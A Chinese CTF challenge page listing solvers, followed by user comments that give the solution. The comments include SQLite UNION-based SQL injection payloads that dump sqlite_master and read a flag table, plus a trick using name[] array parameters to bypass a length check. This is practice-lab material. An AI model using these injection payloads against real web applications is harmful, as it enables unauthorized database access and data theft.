评分(1)
解题动态
ac_11 攻破了该题 10天前
admin_ 攻破了该题 23天前
TortoisEast 攻破了该题 1月前
un 攻破了该题 1月前
edadsadw 攻破了该题 1月前
smtall 攻破了该题 1月前
每天想吃海底捞 攻破了该题 2月前
17351886228 攻破了该题 2月前
shikeerzhi 攻破了该题 2月前
qq12qq 攻破了该题 2月前
lgl 攻破了该题 2月前
nuxe 攻破了该题 2月前
7enz 攻破了该题 2月前
caocao 攻破了该题 4月前
benx4899 攻破了该题 6月前
flyff 攻破了该题 6月前
ctfctf1 攻破了该题 8月前
xiongh 攻破了该题 9月前
若叶 攻破了该题 9月前
评论
不要不要 2年前
举报
bp抓包,URL编码。 name[]=-534249' union select name,sql from sqlite_master--+ 得到表名和建表语句,知道表的字段flag name[]=-534249' union select flag,flag from flag_01ffe035_7ddb_4c79_9a09_8a0b2e6a2705--+
justsosoloveyou 2年前
举报
关键是用name[]=,绕过name.length的长度限制。如:/?name[]=1&name[]=2能够将两个值作为同参数名的数组提交给服务器,但是name=[1,2],name.length=2。
xht0525 2年前
举报
name[]=changzifuchuan' union select name,name from sqlite_master--